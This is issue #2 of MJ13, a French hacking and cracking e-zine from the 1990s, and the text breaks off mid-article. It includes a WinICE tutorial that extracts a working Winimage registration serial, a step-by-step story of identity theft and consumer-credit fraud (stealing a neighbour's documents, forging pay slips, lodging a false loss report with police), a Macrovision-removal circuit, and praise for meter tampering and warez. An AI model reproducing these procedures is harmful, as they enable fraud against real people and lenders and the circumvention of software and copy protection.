MM MM JJJJJJJJJJJJJJ 11 33333333333 MMM MMM JJ 1111 33 MM MM MM MM JJ 11 11 33 MM MM MM MM JJ 11 11 33 MM MMMM MM JJ 11 33333 MM MM MM JJ 11 333 MM MM JJ 11 33 MM MM JJ JJ 11 33 33 MM MM JJJJJJ 11 333333333 ISSUE #2 I/ INTRODUCTION 2/ % DE PIRATAGE INFORMATIQUE [ALLIGATOR427] 3/ COURS DE CRACK 2 [SaMSoN] 4/ HACK DES SOCIETES DE CREDITS (THEME A) [ALLIGATOR427] 5/ BYE LA MACROVISION [MAD666] 6/ VOUS DEBUTEZ EN CRACK? QUE CHOISIR? DOS, WIN? [SaMSoN] 7/ INITIATION AU VIRUS [UnK MnemoniK] 8/ TROUVEZ DES WAREZ!!!! [Shybe] 9/ CDRWIN 3.0a, TRACAGE POUR REGISTRED [DONGLE KILLER, ALLIGATOR427] 10/ VIRUS, EXEMPLE! [UnK MnemoniK] 11/ VIRUS BATCH [DarK BirD (Special thank's)] ******************************************************************************** INTRODUCTION nous avons creer cet e-mag pour diverses raisons, la principale etant de mettre nos connaissances (informatiques & autres) en commun, sur des sujets aussi divers que le Hacking, Phreaking, Virus, Crash, Anarchie, Crack & Programmation de tous les types. On en oublie surement certains.. Ce mag se veut, se doit d'etre a tendance ultra liberaliste et + les fautes d'orthografes y sont volontaires ;-) On peut ecrire sur tout, de votre premier rapport avec un pc, aux hacks, phreak etc en passant par votre premier rapport sex avec votre elephant! on peut aussi construire des bombes, planter des fleurs, recreer la couche d'ozone, piquer des larfeuilles... on fait egalement ca pour envoyer un max de monde en prison! si!!! ------------------------------------------------------------------------------ MEMBRES: | Activité | ----------------------------------------------------------------------------- ALLIGATOR427 / CREATEUR / REDACTION / CRACKER / COURRIER / PhaNToM / CREATEUR / REDACTION / CRACKER / HACKER / MAD666 / CREATEUR / REDACTION / HACKER / COURRIER / SaMSoN / CREATEUR / REDACTION / CRACKER / DIFFUSION / UnK MnemoniK / REDACTION / VIRUS / JLB53 / REDACTION / CRACKER / DONGLE KILLER / REDACTION / CRACKER / PROGRAMMATION PASCAL, DELPHI, ASM. SHYBE / REDACTION / CRACKER / DIFFUSION / RECHERCHE FTP / NECROMANCER / RECHERCHE WAREZ / RANDALL FLAG / CRACKER / BLURPY / RECHERCHE WAREZ / Mister WIL / CRACKER / DIFFUSION / SKELETOR / RECHERCHE WAREZ / Un Welcome special a UnK MnemoniK, de la part de tous. Special Thank's a DaRK BiRD, pour sa participation & article. _____________________________________________________________________________ SITE: www.mygale.org/08/samson/ www.mygale.org/01/mister/ www.mnet.fr/maraga www.toptown.com/HP/mj13 COURRIER: alli427@hotmail.com ----------------------------------------------------------------------------- MJ13 ne saurait etre tenu responsable de l'irresponsabilité de ces auteurs par leurs articles ecris, verifiés ou pas, et des problemes qui pourrait s'en suivre pour vous, lecteurs. nous ne serions etre tenus responsables des causes de la lecture & mise en application des articles ci dessous. Vous savez tous quel procedure employé pour voler dans un supermarché, et vous ne le faites pas pour autant! il est evident que ces articles ont été ecris dans un but d'etude, evitez de prendre ca comme un aller direct a la prison de votre departement. a priori, nous acceptons tout articles traitant de h/p/c/c/a/v, et meme les autres. en aucun cas des articles de themes d'ethique racial ne saurait etre tolérés et admis. si vous voulez casser du noir, ecrivez a Le Pen et pas a nous. toutes personnes faisant partie de notre groupe se doit d'ecrire des articles signées, et de ne divulguer son identité a quiconque, pour quelques raisons que ce soit. L'identité des personnes participant a cet e-mag doit rester confidentiel, afin de s'auto proteger, et de rester .../ Virtuels?\... Vous ne faites pas partie du groupe et souhaitez nous envoyer des articles, nous poser des questions, nous critiquer? ALLEZ-Y!!! vos articles seront lus, soumis a divers menbres & diffusés si jugés intéressant... vos courriers seront traités avec SOINS, et nous vous repondrons soit par mail, soit par diffusion dans notre rubrique questions/ reponses. Vous pouvez egalement vous enregistrer pour recevoir l'issue #3 des sa sortie a l'adresse courrier MJ13: alli427@hotmail.com MJ13 est un magazine de libre diffusion, a but non lucratif, et donc gratuit. Nous vous invitons a le diffuser au maximum. Bonne lecture. ------------------------------------------------------------------------------ WANTED: Articles programmation, cours C, C++, PASCAL..., articles a themes A.. ------------------------------------------------------------------------------ Voici donc l'issue 2.0, qui n'etait plus attendu!!!! ALLIGATOR427 & MAD666 ******************************************************************************** | % DE PIRATAGE INFORMATIQUE | | PAR | | ALLIGATOR427 | ******************************************************************************** ALLIGATOR 427 au cerveau de jade et d'argent. je mouche mon nez, r'monte mes chaussettes, je vous attends. *********************************H.F.T****************************************** Juste histoire de voir comment notre cher pays est placé par rapport au piratage logiciels informatique... PAYS Pourcentage de Piratage: -------------------------------------------------------- Allemagne 71% Australie 45% Belgique 66% Espagne 87% Etats Unis 39% France 83% (c'est pas mal du tout nan?) Italie 86% Japon 96% Singapour 43% Suisse 60% Taiwan 93% Thailande 99% Pole sud: 0% Source: Business Software Alliance, Basés sur un rapport de Novembre 1996 ALLIGATOR427 / MJ13 ******************************************************************************** +------------------------------+ ¦ Initiation au crack, cours 2 ¦ +---------------------¦ par +---------------------+ ¦ +-------SaMSoN-[Mj13/Dsk]------+ ¦ ¦ ¦ ¦ "Messieurs les mecs des ministères ¦ ¦ En meme temps que vos impots ¦ ¦ Vous pouvez faire monter vos bieres ¦ ¦ Y'en a marre !" ¦ ¦ Leo Ferre ¦ ¦ ¦ ¦ +------------------------------+ ¦ ¦ ¦ 1. Introduction ¦ ¦ +---------------------¦ 2. Des Breakpoints... +---------------------+ ¦ 3. Winimage 2.20: le serial ¦ ¦ 4. Les Credits de Mr. SaMSoN ¦ ¦ 5. Contactez moi! ¦ +------------------------------+ +-----------------+ ¦ 1. Introduction +--------------------------------------------------------- +-----------------+ Dans le premier cours, nous avons fait une approche de Winice, en presen- tant rapidement les fonctions de bases. Nous avons egalement fait un crack simple de la boite de dialogue a l'entree de Winimage 2.50, en detaillant la marche a suivre de A a Z. Je vous avait promis de vous montrer comment trou- ver le serial qui correspond a votre nom... Malheureusement, j'ai pomme la version 2.50 (saint bordel de mon disque dur :)... Je vais donc faire cette lecon avec la version 2.20, largement repandue dans les CD-Rom (ou cederom:) fournis avec les revues... Malgre tout, le programme, en ce qui concerne la procedure d'enregistrement, est le meme pour les versions 2.20, 2.50 et 3.0 de Winimage. Seuls les offsets changent. Ainsi, le serial realisé avec Winimage 2.20 fonctionnera avec les versions ulterieures... Avant d'attaquer le serial de Winimage, je vous ferai d'abord une presen- tation generale du principe des breakoints sous Windows. NB: Vous pouvez egalement consulter des tutoriaux en Anglish, le plus se- rieux etant a mon sens celui de +ORC (cherchez "Fravia" avec un moteur de recherche sur le Web) +-----------------------+ ¦ 2. Des Breakpoints... +--------------------------------------------------- +-----------------------+ Pour pouvoir debugger des softs sous Windows, les Breakpoints sont essen- tiels. Il s'agit de "points d'arrets" dans le deroulement d'un programme. En effet, si vous lancez Winimage (ou tout autre soft Windaube) et que vous u- tilisez le Breakpoint de base Ctrl-D, Winice apparait mais vous n'etes cer- tainement pas dans le code source de Winimage, mais quelque par dans les procedures de Windows: l'inconvenient du multitache... On peut (et doit) donc poser des Breakpoints (BP) sur un offset precis du code source (BPX xxxx:xxxxxxxx ou bien F9 apres avoir mis le curseur sur l'offset vise) ou bien encore sur des procedures de Win95. En effet, les softs programmés pour Windows utilisent de nombreuses fonctions proposees par Windows. Ainsi on peut poser des BP sur les boites de dialogues (BPX DIALOGBOXPARAM) ou bien sûr les "messagebox" (BPX MESSAGEBOX) mais sur bien d'autres fonctions (BPX CREATEMENUITEM......) Il m'est impossible de les citer tous, a vous (et a moi) d'en decouvrir d'autres jours apres jours... On peut egalement en poser sur un offset memoire (BPMB xxxx:xxxxxxx) ou sur des interruptions (BPINT) ou sur ce qui sort par le port paralelle (BPIO) Vous le comprenez aisement, trouver le BP efficace n'est pas toujours chose facile. +-----------------------------+ ¦ 3. Winimage 2.20: le serial +--------------------------------------------- +-----------------------------+ On lance donc Winimage, et la boite de dialogue d'enregistrement (opti- ons-|'enregistrement). On entre un nom et un serial bidon (pour moi: "Samson [Mj13] et 12121212 comme serial). La, on va utiliser un BP assez complexe. Il s'agit en effet d'arreter le soft apres avoir valide le nom et le serial avec OK mais avant d'avoir le message qui nous indique que le serial entre est incorrect. On fait donc "surgir" (attention, c'est violent :) Winice avec Ctrl-D... La, on va chercher le nom de la "task" pour Winimage. Il s'agit du nom uti- lise par Windows95 pour le deroulement de Winimage. On entre donc l'instruc- tion "task": TaskName---SS:PP------StackTop--StackBot--StackLow-TaskDB--hQueue--Events Winimant 0000:0000 0066D000 00670000 1BBE 0A8F 0000 Winshade 0000:0000 0066E000 00670000 190E 2817 0000 Impwm 0000:0000 0069D000 006A0000 1A56 19CF 0000 Explorer 0000:0000 0066C000 00640000 1B86 1B37 0000 Any Key To Continue, Esc To Cancel On voit donc les differents taches qui tournent sur mon systeme. Celle qui nous interesse, c'est "Winimant". On note simplement le nom. On execute maintenant l'instruction "Hwnd Winimant", pour avoir le detail des boites de dialogues "en route" avec Winimage: Window-Handle---HQueue--SZ--QOwner----Class Name---------Window-Procedure 02B8(1) 0A8F 32 WINIMANT #32770 (Dialog) 078F:00004757 02BC(2) 0A8F 32 WINIMANT Static 078F:000052FA 02C0(2) 0A8F 32 WINIMANT Edit 079F:00000BF4 02C4(2) 0A8F 32 WINIMANT Static 078F:000052FA 02C8(2) 0A8F 32 WINIMANT Edit 078F:00000BF4 Any Key To Continue, Esc To Cancel Cette instruction nous montre donc la composition de la boite de dialogue selectionnee: - la "fenetre maitresse" dont le Window Handle est suivi de (1) et ses composants, suivis de (2). - Le class name "Static" designe tout ce qui peut etre ecrit ("Nom:";"Serial:") - le class name "Edit" designe les zones de saisie, "Static" qui designe les zones de texte non-editables, etc... On note le Window Handle de l'une de ces zone de saisie, 02C0 par exemple. On a enfin tous les elements pour poser un BP correct: "BMSG 02C0 WM_Gettext" On relance donc le deroulement de Winice avec la touche F5, et l'on valide le nom et le serial entres en cliquant sur "OK". Rapidement, Winice apparait on va enfin pouvoir commencer a tracer dans Winimage. La, il faut faire du "trace over" avec la touche F10, comme un taré, jus- qu'a ce que la boite de dialogue nous indiquant "Donnees incorrectes" appa- raisse. Quant celle-ci est validee, on a le code suivant sous les yeux: xxxx:0040A500 CALL 0040D335 <--- Test du serial xxxx:0040A505 ADD ESP,08 xxxx:0040A508 XOR ECX,ECX xxxx:0040A50A MOV [00421024],EAX xxxx:0040A50F TEST EAX,EAX <--- Si EAX different de 0 xxxx:0040A511 JNZ 0040A53F ------+ Alors Code Faux xxxx:0040A513 MOV EAX,00000001 ¦ Sinon Bon xxxx:0040A518 PUSH 00002000 ¦ xxxx:0040A51D PUSH 0000042D ¦ xxxx:0040A522 MOV [00420C30] ¦ xxxx:0040A527 PUSH 0000042B ¦ xxxx:0040A52C MOV [00420B8C],EAX ¦ xxxx:0040A531 MOV [00420B78],CL ¦ xxxx:0040A537 MOV [00420E28],CL ¦ xxxx:0040A53D JMP 0040A55A ¦ Saut vers: "Code bon" xxxx:0040A53F XOR EAX,EAX <-----+ Debut de la procedure "Faux serial" xxxx:0040A541 PUSH 00002000 xxxx:0040A546 PUSH 0000042D xxxx:0040A54B MOV [00420C30],EAX xxxx:0040A550 PUSH 0000042A xxxx:0040A555 MOV [00420B8C],EAX xxxx:0040A55A PUSH ESI xxxx:0040A55B CALL 0040EB84 <--- Execute la boite "Donnees incorrectes" xxxx:0040A560 ADD ESP,10 xxxx:0040A563 PUSH 00 En traçant comme un fou, on arrive sur le Call de l'offset 0040A55B. Quand on l'execute, la boite de dialogue "Donnees incorrectes" apparait. Il faut maintenant essayer d'analyser le code alentour. - On repere a l'offset 0040A53D un JMP inconditionnel. La procedure "Faux serial" commence donc a l'offset d'apres: 0040A53F. - On cherche donc un saut conditionnel qui renvoie vers cet offset. - On le repere pas tres loin: xxxx:0040A511 JNZ 0040A53F - Peu avant ce JNZ, on repere un xxxx:0040A500 CALL 0040D335; Il y a 95% de chances pour que ce soit ce CALL qui verifie si le serial est bon. On pose donc un BP sur ce call. Deux solutions pour ca: - placer le curseur sur l'offset vise et appuyer sur F9. (Je rappelle que la touche F6 permet de passer de la zone "Edit" de Winice a la zone "Code") - faire un "BPX 0040A500" Les deux ont un resultat equivalent. On remet Winimage en marche avec Winice (F5). On relance la boite de dialogue d'enregistrement. Comme tout a l'heure, on rentre des donnees bidons qu'on valide avec OK. La,Winice apparait a cau- se du BP place plus haut. On n'en a plus rien a foutre. [Petite paranthese: la commande BL vous donne la liste des Breakpoints. Vous pouvez en effacer (BL) en desactiver (bd xx) puis les reactiver (be xx)]. On continue avec F5, jusqu'a ce que Winice s'arrete sur l'offset 0040A500. On "rentre" dans le CALL avec F8. La, on entre vraiment dans la phase de recherche du serial... Je ne vais pas m'amuser a vous retranscrire toute la procedure. Je vais donc vous si- gnaler les offset interessants. Au fur et a mesure que l'on trace on essaye d'abord de reperer les ins- truction du type "PUSH WORD PTR [EBP+08]" et "LEA ECX,[EBP-14]" (bien enten- du, les valeurs ne sont citees qu'a titre d'exemple). Au debut de la procedure, on a l'instruction suivante: xxxx:0040D34B PUSH DWORD PTR [EBP+08] En haut de l'ecran Winice m'indique (ce sera different pour vous): SS:0066F664=00420E28 Donc, je fais un "D 00420E28" pour afficher le contenu de cet offset. Et winice m'affiche "Samson [Mj13]" le nom entre pour l'enregistrement. xxxx:0040D358 LEA ECX,[EBP-14] Je fais un "D EBP-14" cd qui nous donne le serial bidon xxxx:0040D35B LEA EAX,[EBP-28] Un "D EDP-28" ne nous donne pas grand chose. Mais, on a deja eu le nom, le serial bidon. Tout porte a croire que le bon serial sera "case" dans cet offset. On garde donc un oeil dessus. xxxx:0040D361 CALL 0040D2E7 Apres avoir execute ce CALL, l'offset [EBP-28] se modifie et nous donne "2D3A0D60". Cela ressemble a un serial. Mais nous ne somme qu'au debut de la procedure et il ne s'agit probablement que d'une etape interme- diaire. xxxx:0040D395 CALL 0041B8D8 Nouvelle modification de [EBP-28]: "413F26AB" xxxx:0040D3B7 CALL 0040D2E7 Nouvelle modification de [EBP-28]: "44402684" xxxx:0040D3E0 CALL 0040D2E7 Nouvelle modification de [EBP-28]: "3D3F26E1" Nous n'avons, ensuite pas d'autres modifications de cet offset... On relance donc la procedure d'enregistrement avec exactement le meme nom que precedemment et ce que l'on pense etre le serial (pour moi:3D3F26E1) Et... Ca marche! Donc, pour moi: Nom: Samson [Mj13] Serial: 3D3F26E1 Bon, c'est pas forcement evident a expliquer, alors je ne sais pas si j'ai toujours ete clair. Mais, en vous accrochant, ca devrait passer. Quand vous aurez fait ce crack, essayez-vous sur le serial de Winzip, la procedure est assez semblable. +-----------------------------+ ¦ 4. Les credits de Mr Samson +--------------------------------------------- +-----------------------------+ Un grand salut a: Dsk (Snem, Spanik, Dark Angel...), contactez nous: www.mygale.org/11/snem F-Kaos (Cassio-P, Crifalo), Piracy.Fr Tous ceussent qui trainent sur #Warez-France: Ofx, Loginz, Mht, Capitaine, Godfroy, Hocus, Betty3D, etc... Unknown Mnemonic (bienvenue chez nous) [NDLR:voir son article sur les virus.] Vous qui trainez dans la salle d'info de la fac :) ET BIEN SUR LES MEMBRES DE MJ13 -= Et a tous ceux qui font bouger la scene francophone!!! =- +-------------------+ ¦ 5. Contactez moi! +------------------------------------------------------- +-------------------+ E-mail: samsondsk@hotmail.com (plus d'e-mail massons@xiii.univ-angers.fr :) Ma page Web pour trouver mes cracks, des outils,le dernier Mj13... http://www.mygale.org/08/samson/ Sur Irc: Channel #Warez-France ou #Warez_France Nick: Samson ou {Samson} Je recherche egalement des pages Web qui luttent contre le fascisme en France pour une prochaine section de ma page et bien sur, si vous avez une page Web "underground" francophone, n'hesitez pas! +-------------------+ -------------------------------------------------------¦ Samson [Mj13/Dsk] ¦ +-------------------+ ******************************************************************************* | HACK DES SOCIETES DE | | CREDITS | | PAR | | ALLIGATOR427 | ******************************************************************************* ALLIGATOR 427, au long regard phosphorecent, aux ailes de cachemire safran, je grille ma derniere cigarette, je vous attends... Je sais que desormais vivre est un calembour, la Mort est devenu un etat permanent, le monde est un Phantom, aux hyenes &.. aux vautours... *******************************H.F.T******************************************* Ca y est... J'ai reculé mon compteur. E.D.F est venu relevé les nouveaux numéros, et ils ont plongé!!! Fabuleux! Me voici avec une facture de 800 balles pour 6 mois. Correct! Ca s'arrose. 2721eme cuite... Ca aussi ca s'arrose... Un double arrosage! Putain de cuite, ca remonte! il est 20h et j'suis deja bourré. Faut que j'reste debout, j'ai un rencard avec la voisine du troisieme a 22h. Dans l'attente, j'vais cracker un p'tit logiciel, voir si les cours de SaMSoN sont bien clair, ou s'ils sont comme moi. C'est a ce moment precis que le drame se produisit! Je m'eclate la tronche sur mon PC! Haaaa... l'ecran fume, ho, pute de vierge! l'unité centrale aussi. j'suis dans la merde, tout est cramé. Il m'faudrait un nouveau pc! et ce rapidos! Reflechissons: Une fois payer ma facture EDF, mes clopes, la bouffe pour le mois, il me restera entre 400 et 430 balles! genial! Aucun doute, c'est pas avec ca que j'vais m'payer une becane! Quand au credit, en suplement d'etre au chomdu depuis 7 ans (et pourtant je cherche), on a meme pas payer la telé! On a trouvé un compromis et j'leur file 100balles par mois, mais jamais il ne m'en accorderont un autre... Putain, si j'avais pus changer d'identité quelque heures. Mais ca.. Quoi-que... Une idée enflamée vient de me rentrer dans la tete, etre un autre que moi... ouais. Mais qui? vaut mieux que j'prenne une personne que j'connais mais qui risque pas de faire le raprochement avec moi. QUI??? vite, une biere, ca m'aidera a penser, puis tt facons j'ai decuité.. Tiens, j'vais m'calmer.. 3 valium! au diable l'avarice... 20h40: tjrs pas de cible.. 20h50: mon rencard approche.. son mec part bossé a 22h00, ma femme se pieute a 21h00, tu parles, on s'eclate! son mec, tu parles d'1 con! Agent de securité qu'il est.. il s'l'a joue rambo tandis que j'm'envoie sa femme..., la j'rigole!! 21h10: son mec... il m'connait a peine. bonjour dans l'escalier, par contre, moi j'connais tout sur lui. Voila une cible potentiel! 21h30:je dresse une strategie: Je reste chez la gonzesse, et quand elle dort je fouine. faut trouver une piece d'identité a lui, un bulletin de salaire, une quittance de loyer ou EDF, un RIB et ca devrait coller. 21h45:1 autre biere.. 22h00: un oeil par la fenetre, sa bagnole est plus la.. Je monte. salut beauté, seul? elle se jette sur moi et... j'vous passe les details, non mais! 22h33, l'affaire est bouclé, fallait qu'ca speed, et j'ai autre chose a penser elle dort pas encore! bon, ben, j'vais l'interroger comme si de rien etais. Tu t'en sors financierement? t'as des credits? et ton mec, il en a? il t'aide? juste un pour la bagnole, juste 1 credit.. endorts toi.. j'vais pas lui chanter une berceuse qd meme! 23h30: ca y est!! si!! elle pionce! allez go, au boulot. j'me leve en douceur, et hop, dans la cuisine. au mur un truc en pendant avec inscrit "PAYER" et "A PAYER". ca simplifie la tache ca.. dans les payer: une facture de telephone, la redevance telé, EDF!!! ha! elle a eté payé y'a un mois. zzou, dans la poche, j'la r'mettrais d'main! Y'a aussi un relevé de compte qui fera office de RIB, j'aurais pus l'piquer au courrier m'enfin j'suis pressé (de finir ce putain d'article!) direction la salle, j'ouvre un premier placard, rien.. un second et hop, dans une pochette rouge, les bulletins de salaire! et hop, le dernier, et pendant que j'y suis j'vais meme prendre les 3 derniers + un bulletin dans les premiers. des photocop et ca ira.. (j'tiens a preciser qu'on peut faire des bulletins de salaire soi meme, en reprenant les cotis. sociales, que l'URSAFF se fera un plaisir de vous donner, prenez aussi le num de SIRET pour refaire un tampon en vitesse... les dates, des fois ou on telephonerais a la boite, on est jamais assez prevoyant) Maintenant, une piece d'identité... dans le couloir, au porte manteau, y'a 2 blousons a lui.. Allez, j lui fais les poches! Paf, ca n'aurait su rater, pas de permis de conduire mais une piece d'identité. Crayon, papier et j'note: nom, prenom, date de naissance, n°de la piece... celle la, j'peus la remettre.. j'ai tout ce qui me faut. 0h50: je redescends me coucher... 9h10: reveil.. les gosses a l'ecole, la femme j'sais pas ou.. pour moi c'est une bonne journée qui commence. une biere! Hey, c'est la premiere! pas de commentaires! une douche, un coup de rasoir, des fringues propres et il est deja 10h30. bus pour me rendre a une boutique ou l'on fait des photocopies seul. 1f60 et voila mes bulletins de salaires, en meilleurs etats que les originaux. j'vais les chiffoner un poil. voila, maintenant elle sont plus ressemblante!. il est midi.. j'vais boire l'apero. 15h00: sortis du bar. 15h10: direction le commisseriat central de ma p'tite ville: TOULON j'entre.. -monsieur? m'interpelle t'on. -oui, excusez moi mais j'ai un petit probleme, j'ai perdu mon portefeuille, et je me trouve sans piece d'identité ni permis, c'est ennuyeux. -Nous allons vous faire remplir une declaration de perte, ca fera office de piece d'identité ou permis pour 2 mois. -ha, ouf, vous ne pouvez imaginez combien vous me rendez service. -mais nous sommes la pour ca.. (menteur qu'ils sont!) je remplis donc cette declaration de perte, il va sans dire que j'ai appris par coeur le nom, prenom & date de naissance de mon cher voisin. arrive le moment ou on demande le numero des pieces... alors la, je sors mon papier ou c'est noté et j'inscris.. (ca marche aussi sans le numero!) je lui remets tout ca, lui demande de me la tamponner, en cas ou on prendrais ce papier pour un faux(je demande pour faire lm'ignorant! il tamponne toujours!). il le fait, et, adieu & merci! sisi, ca se passe comme ca! me voila donc avec tous les papiers necessaires au credit. j'commence a etre pressé vu l'heure, et il me faut un magasin style supermarche ou grosse surface avec meubles et tout.. un petit magasin se rapellerait trop facilement de mon visage. je choisis conforama, et m'y rends en taxi. voila l'utilisation ingenieuse de mes 400balles de fin de mois.. j'y entre. mon coeur cogne.. et si ca foire??? qui ne tente rien n'a rien et j'y tiens a prendre un nouveau pc. rayon informatique. la j'y connais plus rien en informatique, j'laisse un vendeur me faire son baratin.. faut surtout pas que je prenne la plus grosse becane, avec scanner, imprimante etc.. j'vais meme prendre la promo a 9 990f. je reste un peu sceptique au baratin du vendeur, mais il croit me trainer dans la farine et hop! l'affaire se conclut. arrive enfin le mode de paiement. je sors: a credit... et la il me cite: 1 piece d'identité, 1 rib, vos 3 derniers bulletins de sal- aires, et une quittance loyer, facture telecom, edf... j'ai tout dans ma poche, j'lui sors avec la declaration de perte... la il regarde ca.. et moi j'lui explique que j'ai perdu mes papiers et que je sors du commissairiat etc, etc.. il a pas envie de perdre son pourcentage, donc il accepte le tout.. quand il me demande combien d'apport cash je fais, je prends un air surpris, et lui dis tres gentiment que je pensais qu'il n'y avait rien a payer au depart (vous pouvez aussi lui filez 500f, ca passe mieux).. il pose tout un tas de question, montant de loyer, nombre d'enfant a charge etc... j'connais l'voisin, le loyer? j'le descends de 500 balles, enfant? y'en a pas! etc... 10mn sur minitel et voila.. il vous dis que c'est bon.. normalement... je rentre, allume mon nouveau pc,oublie la voisine, ma femme et me fais arreter 6 mois plus tard, au cours de mon arrestation,ca se passe mal, et j'tue 1 flic avec un ecumeur, j'suis jetter dans une cave avec des grilles sur une fenetre en aglomaré, et c'est de la que j'vous raconte ca... plus que 20 ans a tirer, a defaut de la voisine... Bon, j'ai abrégé, mais l'idée de base y est, et sachez que ca marche, j'espere. j'avais le choix entre ca, ou des cours d'asm! mais sans pc, pas de possibilité de cours!!! alors... J'ai abregé disais-je, lisez entre les lignes... cherchez pas une voisine au troisieme... j'ai voulu par cet article, trouvez et expliquez une faille de plus de notre systeme. Bien que, je me repéte, la technique de base est bonne et fonctionne, je l'ai deja vu faire, je ne me tiens en aucun cas responsable de vos actes et test. Quand a moi, je n'habite pas TOULON, et n'ai pas de voisine au troisieme. Je remercie le commissairiat de TOULON ainsi que les magasins CONFORAMA pour leur aimable collaboration!! PS: Si je mourrais enfermé suite a cet article, je ne veux en aucun cas etre mis en biere.. non.. Quand le pinnochio baveux poussera ma brouette a Lancoux j'veux qu'on m'degaze au gin/Sinthol, dans une piole de Jonnhy Walker, a la Vodka d' chez warold; avec du Tomato campell!!! J'veux qu'on m'serve un apero, si possible un double zero, afin de rencontrer Blanche Neige, et de fumer un des sept nains!.. je compte sur vous.. Je recherche a peter tous sites pedophiles! Fuck a tous les pedophiles!!! pour me contacter: ecrire au courrier... ALLIGATOR427 / MJ13 ALLIGATOR 427, au souffle d'or et de diamant, je sais que vous etes fin pret, je vous attends. Je sais que tu as la beauté destructive et le sourire vaincu comme un dernier soupir, tu sais que nos enfants s'appeleront Vers de terre... 'hft' A ma Femme. Je sais que vos machoires distille... l'agonie, a chaque parole!...'hft' A Vous tous... ******************************************************************************** ******************************************************************************* MACROVISION ,ou comment "cracker" les cassettes videos. Par MAD666 ******************************************************************************* Fichiers additionnels:MVISION1.GIF: implantation des composants. MVISION2.GIF: Shéma circuit imprimé double-faces (200dpi) Voilà enfin ce sujet tant attendu par certains membres du groupe. Historique: Depuis une 10ène d'années,les fabriquants/dupliqueurs de cassettes ont étés confrontés à un problème:Le Piratage. Aprés de nombreuses études par des ingénieurs/électroniciens,ils trouvairent un moyen de protection contre ce piratage,ce qui,à priori,et a forciori aussi ;-),parraissait materiellement impossible à faire au depart sans électronique spécialisé dans les magnetoscopes. Il fut mis au point differents systemes,chacun propres à chaque fabriquants/dupliqueurs. Il se posa alors un probleme:Chaque magnetoscope n'etant pas adapté spécifiquement à chaque systemes,cela rendait tout simplem- -ent illisible certaines cassettes sur certains modèles de magnétoscope !!! Vers 1995,il fut décidé d'un systeme unique de protection pour tout les fabriquants/dupliqueurs,et ce,en collaboration avec les fabriquants de scopes afin de rendre la protection totalement transparente pour l'utilisateur,et pour quelle soit le plus fiable possible. Procédé: La macrovision est un pocédé relativement simple qui joue entre la synchronisation des 2 scopes relier entre eux. En résumant rapidement : On insère des lignes de synchro avant le signal image,ce qui a pour efait, lors d'une copie,de ne pas copier ces lignes convenablement sur le scope de destination,et donc,de rendre la copie quasi illisible (sottement de l'image, spot lumiere ...) En jouant sur la synchro verticale d'un moniteur,on peux visualiser ces lignes indésirables en baissant l'image vers le bas.il apparrait alors,en haut,des lignes de synchro qui ne devrait plus etre là si on veux pouvoir copier les cassettes ... Remède: Un petit circuit electronique à inserer entre l'entrée et la sortie SCART des 2 scopes,qui permet,tout simplement,d'effacer ce signal indesirable. Ce petit circuit ne vous coûteras gère plus de 300F et rend toute protection inéfficace (la copie elle-même peux ensuite être recopiée à l'infini sans ce boitier). Ce circuit ce compose de quelque composants facile à trouver (à part 1 ou 2 un peu plus difficile),d'un circuit imprimé double-faces (dimension:75mm*67mm voir MVISION2.GIF à imprimer (scanné a 200 dpi)). Il possède une entrée et une sortie SCART où il faudras y brancher respectivement la sortie du scope lecteur et l'entrée du scope enregistreur. Pour savoir à quel fil correspond le signal entrée ou sortie SCART,voici un petit shéma d'une fiche SCART (aussi appelée fiche PERITEL): +-----------------------------\ ¦ 1 3 5 7 9 11 13 15 17 19 21 \ ¦ 2 4 6 8 10 12 14 16 18 20 \ +--------------------------------\ Voilà,en gros ;-) une fiche PERITEL . L'ENTRéE SCART est la broche N°20 et la SORTIE la N°19 Pour alimenter ce circuit,il vous faudras 2 alimentations. L'une de 5 volts, l'autre de 12 volts. La consomation du circuit ne doit gère depasser les 150 mA .Vos alims doivent êtres stables et bien regulées  Un conseil au cas ou vous auriez du mal à trouver un ou plusieurs composants chez le cremier de votre ville : potassez les pubs des revues electronique et commandez les en VPC (à Paris,y'a tout normalement !) Liste des composants: U1 : LM1881 Sync seperate U2 : 74HC4538 U3 : 74HC02 U4 : 74HC4316 C1 : 1.5n Silver Mica Q1 : 2N3904 C2 : 2.2n Silver Mica R1 : 300 Kohms C3 : 4.7y Polyester (important !) R2 : 390 Kohms C4 : 100n R3 : 75 ohms C5 : 100n R4 : 620 ohms C6 : 560p R5 : 680 Kohms C7 : 47y R6 : 1 Kohms C8 : 220p R7 : 10 Kohms C9 : 100p R8 : 10 Kohms C10 : 1000y R9 : 120 ohms Voilà que ce termine ce seul et unique article sur le façon de virer la Macrovision des cassettes video. C'est vrais quoi ! dejà 3 pages pour parler de çà,c'est plutot balaise,en fesant trainer le sujet et tout et tout ... Si vous voulez un article plus long,moi je veux bien  je peux vous parler du chien de ma grand-mère qui est presque aussi malade quelle,ce qui est dejà tres grave,vu son etat. Si on fait rien,il va mourrir le pauvre ... A mon avis,faudrais penser a la piquer, la grand-mère, sinon,il va pas survivre le pauv' ptit toutou ... Ok,OK ! j'arrete !!! Et que cet article ne vous serve pas a copier les cassettes copyrightées !!! MAD666 ******************************************************************************* +------------------------------+ ¦ Debuter en Crack ¦ ¦ Dos ou Windows ? ¦ +---------------------¦ par +---------------------+ ¦ +-------SaMSoN-[Mj13/Dsk]------+ ¦ ¦ ¦ ¦ A tous les combattants de l'ombre ¦ ¦ J'adresse un message d'espoir ¦ ¦ Pour que leur Fronde ¦ ¦ Se transforme un jour en victoire! ¦ ¦ Molodoi. ¦ ¦ ¦ ¦ +------------------------------+ ¦ ¦ ¦ 1. Introduction ¦ ¦ +---------------------¦ 2. Les points communs +---------------------+ ¦ 3. Specificites Dos ¦ ¦ 4. Specificites Windows ¦ ¦ 5. Conclusion ¦ +------------------------------+ +-----------------+ ¦ 1. Introduction +--------------------------------------------------------- +-----------------+ On m'a souvent pose la question:"Pour debuter en crack, par quoi je dois commencer: Dos ou Windaube ?". Et la, je me suis trouve tres con pour expli- quer en deux mots ce que j'en pensait. Voila donc un petit article pour cla- rifier les choses. +-----------------------+ ¦ 2. Les points communs +--------------------------------------------------- +-----------------------+ Softice (debugger Dos) et Winice (debugger Win) ont le meme look, a deux trois details pres, peu importants. Softice est en mode 16 bits alors que Winice 95 est en mode 32 bits, ce qui modifie un poil les mnemoniques, mais franchement, ca change pas grand chose pour nous. Le code source est toujours en Assembleur (Saint Langage qui en rebute plus d'un :). Au niveau des instructions pour les debuggers, elles restent souvent identiques en ce qui concerne les breakpoints, les editions de regi- stres, la modification du code source, etc... On retrouve encore le loader qui permet de debugger un soft des le debut de son code source: Wldr sous Win et 